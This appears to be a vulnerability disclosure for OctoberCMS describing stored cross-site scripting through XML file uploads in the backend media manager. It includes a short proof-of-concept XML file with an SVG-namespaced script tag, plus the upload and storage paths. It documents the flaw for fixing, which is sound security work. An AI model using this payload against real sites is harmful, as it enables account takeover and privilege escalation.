✍️ Description

OctoberCMS uses october/rain library to handle file uploads. Previously it was possible to upload malicious files with HTML content to the CMS via its Media upload feature. This security issue marked as CVE-2020-15249 was fixed in 1.0.469. But it is still possible to upload XML files. Since browsers render XML files depending on their XML namespace, we can create an XSS from within an XML file.

🕵️‍♂️ Proof of Concept

While logged in as a user with upload privileges, visit backend/backend/media and upload an XML file with the following content:

// PoC.xml
<script xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg">
alert('xss');
</script>

The file gets uploaded at /storage/app/media/PoC.xml

💥 Impact

This vulnerability is capable of Stored Cross Site Scripting which can be leveraged to perform account takeover, privilege escalation, Server Side Template Injection, and can also be chained with some other vulnerability to gain remote code execution.